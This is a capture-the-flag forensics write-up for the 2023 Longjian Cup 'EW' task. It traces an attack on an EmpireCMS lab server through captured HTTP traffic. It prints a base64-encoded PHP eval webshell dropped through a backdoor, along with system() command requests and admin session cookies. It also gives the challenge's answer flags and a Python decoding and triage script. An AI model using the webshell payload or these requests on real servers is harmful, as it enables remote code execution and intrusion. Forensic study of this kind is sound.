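2023 Longjian Cup (陇剑杯) EW Write-Up

Attachment: https://caiyun.139.com/m/i?125Ce4UIWFs84
Extraction code: HY3O

1. What is the file name of the backdoor that ships with the server? (Include the file extension.)

Solution steps

Filter the capture for HTTP traffic and follow the TCP streams. In stream 10062, a POST to ViewMore.php writes d00r.php, so the pre-planted backdoor is ViewMore.php.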

GET /e/public/ViewClick/ViewMore.php HTTP/1.1
Host: 192.168.162.130:82
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: 87f1cb30dabd76bc06b0ef55c92755cd=75cc1f3e-b5df-4515-95a8-2ad4c1b0abd4.4esLyTKflS3qL4XtnkXZVOajfK8
Upgrade-Insecure-Requests: 1

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 29 May 2022 16:41:08 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip

POST /e/public/ViewClick/ViewMore.php HTTP/1.1
Host: 192.168.162.130:82
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 117
Origin: http://192.168.162.130:82
Connection: keep-alive
Referer: http://192.168.162.130:82/e/public/ViewClick/ViewMore.php
Cookie: 87f1cb30dabd76bc06b0ef55c92755cd=75cc1f3e-b5df-4515-95a8-2ad4c1b0abd4.4esLyTKflS3qL4XtnkXZVOajfK8
Upgrade-Insecure-Requests: 1

a=file_put_contents%28%27d00r.php%27%2C+base64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs%2FPg%3D%3D%27%29%29%3BHTTP/1.1 200 OK
Server: nginx
Date: Sun, 29 May 2022 16:41:31 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip

GET / HTTP/1.1
Host: 192.168.162.130:82
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: 87f1cb30dabd76bc06b0ef55c92755cd=75cc1f3e-b5df-4515-95a8-2ad4c1b0abd4.4esLyTKflS3qL4XtnkXZVOajfK8
Upgrade-Insecure-Requests: 1

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 29 May 2022 16:41:43 GMT
Content-Type: text/html
Last-Modified: Sun, 17 Apr 2022 10:37:13 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
ETag: W/"625bedd9-2b98"
Content-Encoding: gzip

flag{ViewMore.php}

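2. What is the server's internal IP address?

Solution steps

Question 1 showed that the one-line webshell that was written takes its input from the cmd parameter. Filtering for HTTP POST requests that contain the string cmd shows that the ifconfig command was executed.

Following the HTTP stream reveals the internal IP address.

Request packet: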
POST /e/public/ViewClick/d00r.php HTTP/1.1
Host: 192.168.162.130:82
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
Origin: http://192.168.162.130:82
Connection: keep-alive
Referer: http://192.168.162.130:82/e/public/ViewClick/d00r.php
Cookie: 87f1cb30dabd76bc06b0ef55c92755cd=75cc1f3e-b5df-4515-95a8-2ad4c1b0abd4.4esLyTKflS3qL4XtnkXZVOajfK8; uthnologinnum=1; uthnolastlogintime=1653842544; pdkemecmsdodbdata=empirecms; pdkemloginuserid=1; pdkemloginusername=admin; pdkemloginrnd=INFhTsklTmjnFzfOZtAz; pdkemloginlevel=1; pdkemeloginlic=empirecmslic; pdkemloginadminstyleid=1; pdkemloginecmsckpass=6f8d543c26e846056bf8e3ac2b865c36; pdkemloginecmsckfrnd=LhitdkhqjwBZzWPM2HdHriVI00E; pdkemloginecmsckfdef=Z10cCLkIIMNt0amoD0OJmD; pdkememecXmngEOxi=zRaZTxhh3rNGu9UERE; pdkemlogintime=1653842559; pdkemtruelogintime=1653842549
Upgrade-Insecure-Requests: 1

cmd=system%28%27ifconfig%27%29%3BHTTP/1.1 200 OK
Server: nginx
Date: Sun, 29 May 2022 16:44:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip

br-2fc7bfd07160: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 02:42:7b:5a:86:ea  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

docker0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 02:42:b9:e3:56:83  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.162.130  netmask 255.255.255.0  broadcast 192.168.162.255
        inet6 fe80::ae06:234d:1e0a:9aac  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:08:04:89  txqueuelen 1000  (Ethernet)
        RX packets 397410  bytes 398085633 (398.0 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 140095  bytes 20078864 (20.0 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

ens38: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.101.132  netmask 255.255.255.0  broadcast 192.168.101.255
        inet6 fe80::68af:1a5:a54c:7366  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:08:04:93  txqueuelen 1000  (Ethernet)
        RX packets 362  bytes 35928 (35.9 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1654  bytes 141760 (141.7 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 7070  bytes 3169973 (3.1 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 7070  bytes 3169973 (3.1 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
flag{192.168.101.132}

3. What is the key the attacker wrote to the server?

Solution steps

Using the same filter as in question 2, we find a request that writes content with file_put_contents.

Decode the base64 payload.

Request packet:

POST /e/public/ViewClick/d00r.php HTTP/1.1
Host: 192.168.162.130:82
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 347
Origin: http://192.168.162.130:82
Connection: keep-alive
Referer: http://192.168.162.130:82/e/public/ViewClick/d00r.php
Cookie: 87f1cb30dabd76bc06b0ef55c92755cd=75cc1f3e-b5df-4515-95a8-2ad4c1b0abd4.4esLyTKflS3qL4XtnkXZVOajfK8; uthnologinnum=1; uthnolastlogintime=1653842544; pdkemecmsdodbdata=empirecms; pdkemloginuserid=1; pdkemloginusername=admin; pdkemloginrnd=INFhTsklTmjnFzfOZtAz; pdkemloginlevel=1; pdkemeloginlic=empirecmslic; pdkemloginadminstyleid=1; pdkemloginecmsckpass=6f8d543c26e846056bf8e3ac2b865c36; pdkemloginecmsckfrnd=LhitdkhqjwBZzWPM2HdHriVI00E; pdkemloginecmsckfdef=Z10cCLkIIMNt0amoD0OJmD; pdkememecXmngEOxi=zRaZTxhh3rNGu9UERE; pdkemlogintime=1653842559; pdkemtruelogintime=1653842549
Upgrade-Insecure-Requests: 1

cmd=file_put_contents%28%27k3y_f1le%27%2C+base64_decode%28%27UEsDBBQAAQAAANgDvlTRoSUSMAAAACQAAAAHAAAAa2V5LnR4dGYJZVtgRzdJtOnW1ycl%2FO%2FAJ0rmzwNXxqbCRUq2LQid0gO2yXaPBcc9baLIAwnQ71BLAQI%2FABQAAQAAANgDvlTRoSUSMAAAACQAAAAHACQAAAAAAAAAIAAAAAAAAABrZXkudHh0CgAgAAAAAAABABgAOg7Zcnlz2AE6DtlyeXPYAfldXhh5c9gBUEsFBgAAAAABAAEAWQAAAFUAAAAAAA%3D%3D%27%29%29%3BHTTP/1.1 200 OK
Server: nginx
Date: Sun, 29 May 2022 16:46:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip

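Use Python to write the decoded data to a zip file.

The Python code is as follows:

import base64

# 1.txt holds the base64 string taken from the cmd parameter.
# It must already be URL-decoded (%2F -> /, %3D -> =).
with open('1.txt', 'r') as src:
    text = src.read().strip()

# Decode the base64 text and save the raw bytes as a zip archive.
with open('1.zip', 'wb') as dst:
    dst.write(base64.b64decode(text))

The decoded data turns out to be a zip archive, so it is saved as a .zip file.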
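
The two file_put_contents requests quoted in this write-up (the d00r.php drop in question 1 and the k3y_f1le drop in question 3) can be triaged directly from their POST bodies. The following is an added example, not the author's code; the names triage and zip_local_header are chosen here, and it goes slightly beyond the write-up by reading the zip local file header to show that the archive is encrypted before it is opened.

```python
import base64
import re
import struct
from urllib.parse import parse_qsl

# POST bodies copied from the two requests quoted in this write-up.
BODY_DOOR = "a=file_put_contents%28%27d00r.php%27%2C+base64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs%2FPg%3D%3D%27%29%29%3B"
BODY_KEY = "cmd=file_put_contents%28%27k3y_f1le%27%2C+base64_decode%28%27UEsDBBQAAQAAANgDvlTRoSUSMAAAACQAAAAHAAAAa2V5LnR4dGYJZVtgRzdJtOnW1ycl%2FO%2FAJ0rmzwNXxqbCRUq2LQid0gO2yXaPBcc9baLIAwnQ71BLAQI%2FABQAAQAAANgDvlTRoSUSMAAAACQAAAAHACQAAAAAAAAAIAAAAAAAAABrZXkudHh0CgAgAAAAAAABABgAOg7Zcnlz2AE6DtlyeXPYAfldXhh5c9gBUEsFBgAAAAABAAEAWQAAAFUAAAAAAA%3D%3D%27%29%29%3B"

# Matches: file_put_contents('<name>', base64_decode('<data>'))
WRITE_RE = re.compile(
    r"file_put_contents\(\s*'([^']+)'\s*,\s*"
    r"base64_decode\(\s*'([A-Za-z0-9+/=]+)'\s*\)\s*\)"
)


def zip_local_header(blob):
    """Parse the first zip local file header (30 fixed bytes plus the name)."""
    if len(blob) < 30 or blob[:4] != b"PK\x03\x04":
        return None
    (_sig, _ver, flags, method, _time, _date, _crc,
     csize, usize, nlen, _elen) = struct.unpack("<4s5H3I2H", blob[:30])
    return {
        "member": blob[30:30 + nlen].decode("utf-8", "replace"),
        "encrypted": bool(flags & 0x1),  # general-purpose flag bit 0
        "method": method,                # 0 = stored, 8 = deflate
        "compressed_size": csize,
        "uncompressed_size": usize,
    }


def triage(body):
    """Return one finding per file write in a urlencoded webshell POST body."""
    findings = []
    for param, value in parse_qsl(body, keep_blank_values=True):
        for name, b64 in WRITE_RE.findall(value):
            blob = base64.b64decode(b64, validate=True)
            finding = {"param": param, "written_file": name, "size": len(blob)}
            if blob.startswith(b"<?php"):
                finding["kind"] = "php"
                finding["source"] = blob.decode("utf-8", "replace")
            elif blob.startswith(b"PK\x03\x04"):
                finding["kind"] = "zip"
                finding.update(zip_local_header(blob) or {})
            else:
                finding["kind"] = "unknown"
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for body in (BODY_DOOR, BODY_KEY):
        for finding in triage(body):
            print(finding)
```

For k3y_f1le the header reports a stored, encrypted member named key.txt; the 12-byte gap between compressed and uncompressed size matches the header that traditional zip encryption prepends, which is why the password from stream 10098 is needed.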

Following stream 10098 reveals the password.

Request packet:

7e03864b0db7e6f9POST /e/public/ViewClick/d00r.php HTTP/1.1
Host: 192.168.162.130:82
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Origin: http://192.168.162.130:82
Connection: keep-alive
Referer: http://192.168.162.130:82/e/public/ViewClick/d00r.php
Cookie: 87f1cb30dabd76bc06b0ef55c92755cd=75cc1f3e-b5df-4515-95a8-2ad4c1b0abd4.4esLyTKflS3qL4XtnkXZVOajfK8; uthnologinnum=1; uthnolastlogintime=1653842544; pdkemecmsdodbdata=empirecms; pdkemloginuserid=1; pdkemloginusername=admin; pdkemloginrnd=INFhTsklTmjnFzfOZtAz; pdkemloginlevel=1; pdkemeloginlic=empirecmslic; pdkemloginadminstyleid=1; pdkemloginecmsckpass=6f8d543c26e846056bf8e3ac2b865c36; pdkemloginecmsckfrnd=LhitdkhqjwBZzWPM2HdHriVI00E; pdkemloginecmsckfdef=Z10cCLkIIMNt0amoD0OJmD; pdkememecXmngEOxi=zRaZTxhh3rNGu9UERE; pdkemlogintime=1653842559; pdkemtruelogintime=1653842549
Upgrade-Insecure-Requests: 1

cmd=system%28%27ls+%2Fwww%2Fwwwroot%27%29%3BHTTP/1.1 200 OK
Server: nginx
Date: Sun, 29 May 2022 16:46:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip

cms.com
default
www.1.com

Use 7e03864b0db7e6f9 as the password to decrypt the archive and obtain the key.

flag{7d9ddff2-2d67-4eba-9e48-b91c26c42337}